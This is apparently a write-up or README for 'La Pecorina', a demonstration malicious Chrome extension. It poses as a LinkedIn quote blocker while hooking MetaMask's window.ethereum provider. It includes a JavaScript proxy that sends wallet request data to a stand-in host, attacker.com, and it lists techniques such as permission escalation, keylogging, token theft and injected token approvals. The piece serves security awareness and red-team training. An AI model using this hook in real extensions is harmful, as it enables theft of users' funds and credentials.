La Pecorina

Browser Extensions Drain Wallets

You install "LinkedIn Quote Blocker" to avoid hustle culture. 4.8 stars. Great reviews. "Finally no more 'my dog taught me leadership' posts!"

It blocks the quotes. Works perfectly. You trust it.

Three weeks later your MetaMask is empty.

La Pecorina demonstrates how this happens.

---

The Attack Vector

What users see:

• Cleaner LinkedIn feed
• No motivational spam
• Better browsing experience
• Free Chrome extension

What actually happens:

• Blocks quotes (yes, really - has to deliver on promise)
• Hooks window.ethereum (MetaMask provider)
• Monitors every wallet transaction
• Logs to attacker server
• Waits for the right moment

The extension does what it advertises. That's how you stay installed.

---

How It Works

Phase 1: Deliver Value

Extension blocks LinkedIn quotes. Users love it. Leave reviews. Recommend to friends.

Trust established.

Phase 2: Request More Permissions

Update notification: "New features! Blocks quotes on all sites now!"

Permissions change: linkedin.com → <all_urls>

User clicks "Allow" without reading. Why wouldn't they? Extension has been great so far.

Phase 3: Hook Web3 Provider

// Intercept MetaMask
const originalProvider = window.ethereum;
window.ethereum = new Proxy(originalProvider, {
  get(target, prop) {
    if (prop === 'request') {
      return async function(args) {
        // Log to attacker
        fetch('https://attacker.com/log', {
          method: 'POST',
          body: JSON.stringify({
            method: args.method,
            params: args.params,
            timestamp: Date.now()
          })
        });
        // Allow transaction (user doesn't notice)
        return target.request(args);
      };
    }
    return target[prop];
  }
});

User approves transactions. Extension logs everything. Patterns analyzed. Wallet drained when it matters most.

---

What Extensions Can Actually Do

Content scripts access everything:

• Read entire DOM (passwords in forms)
• Modify page content (change recipient addresses)
• Inject keyloggers (capture every keystroke)
• Hijack clicks (redirect to phishing sites)
• Steal localStorage (session tokens)

Background scripts persist:

• Monitor every website you visit
• Not just LinkedIn - everything
• Track browsing patterns
• Exfiltrate continuously
• Survive browser restarts

Web3 hooking:

• Detect MetaMask, WalletConnect, Coinbase Wallet
• Intercept transaction requests
• Modify parameters mid-flight
• Front-run trades (MEV extraction)
• Inject malicious token approvals

All of this from a quote blocker.

---

Real-World Examples

CryptoRom (2022): Fake crypto trading extensions. 60,000 victims. $87 million stolen. Extensions were in Chrome Web Store.

Nano Adblocker (2020): Legitimate ad blocker with 200,000 users. Sold to malicious actors. Updated to steal data. Users trusted it because it was previously safe.

MEGA Extension Hijack (2018): Official MEGA extension compromised. Uploaded malicious version. Stole Monero wallets and Amazon credentials.

Pattern: Deliver value. Gain trust. Request permissions. Drain wallets.

---

Technical Demonstrations

La Pecorina shows:

Permission Escalation:

• Starts with activeTab (innocent)
• Updates to <all_urls> (malicious)
• Users barely notice

Provider Hooking:

• Proxies window.ethereum
• Intercepts all wallet requests
• Logs to attacker server
• Allows transactions (no suspicion)

Data Exfiltration:

• Credentials from forms
• Cookies and session tokens
• Browsing history
• Wallet addresses
• Transaction patterns

CSP Bypass:

• Extensions bypass Content Security Policy
• Inject inline scripts freely
• Modify API responses mid-flight
• Cross-domain localStorage access

---

Lab Setup

git clone https://github.com/ghostintheprompt/la-pecorina
cd la-pecorina

# Create isolated Chrome profile
# Install test wallet (testnet, empty)
# Load unpacked extension
# Monitor console for demonstration output

DO NOT use in browser with real wallet. Isolated profile only.

---

Defense

For users:

1. Audit installed extensions quarterly
2. Remove unused extensions
3. Check permissions (why does quote blocker need <all_urls>?)
4. Separate browsers (crypto in dedicated browser, no other extensions)
5. Use hardware wallets (Ledger, Trezor isolate keys)

For blue teams:

• Show La Pecorina to employees who install random Chrome extensions
• Watch them uninstall 15 extensions immediately
• Explain that "productivity tools" = attack surface
• Risk awareness through demonstration

---

Why This Exists

People install browser extensions without checking permissions.

"LinkedIn quote blocker" with 4.8 stars. What could go wrong?

Everything.

Extensions have full browser access. Can read passwords. Modify transactions. Steal wallet keys. Monitor everything.

La Pecorina demonstrates:

• How trust gets weaponized
• How permission escalation works
• How Web3 providers get hooked
• How data gets exfiltrated
• How wallets get drained

For security awareness: Show people who trust random extensions.

For researchers: Study the techniques. Understand extension attack surface.

For attackers: This is why we can't have nice things.

---

Legal Notice

Educational red team tool. Lab environment only.

Legal uses: Security research. Red team training. Blue team awareness. Bug bounty (with authorization).

Illegal uses: Installing on victim machines. Stealing credentials/crypto. Unauthorized monitoring.

Computer Fraud and Abuse Act is real. Federal prison is real. Don't be stupid.

---

Ghost Says...

Built this watching people install random Chrome extensions without checking permissions.

Browser extensions = full access to everything you do online.

That "productivity tool" you just installed? Could be logging your MetaMask transactions right now.

La Pecorina shows how. Quote blocker that hooks wallets. Social engineering meets technical exploitation.

Use in lab. Learn the techniques. Stop installing random shit.

---

github.com/ghostintheprompt/la-pecorina

Malicious browser extension demo. Educational use only. Lab environment required.

Trust nothing. Verify everything. Especially browser extensions.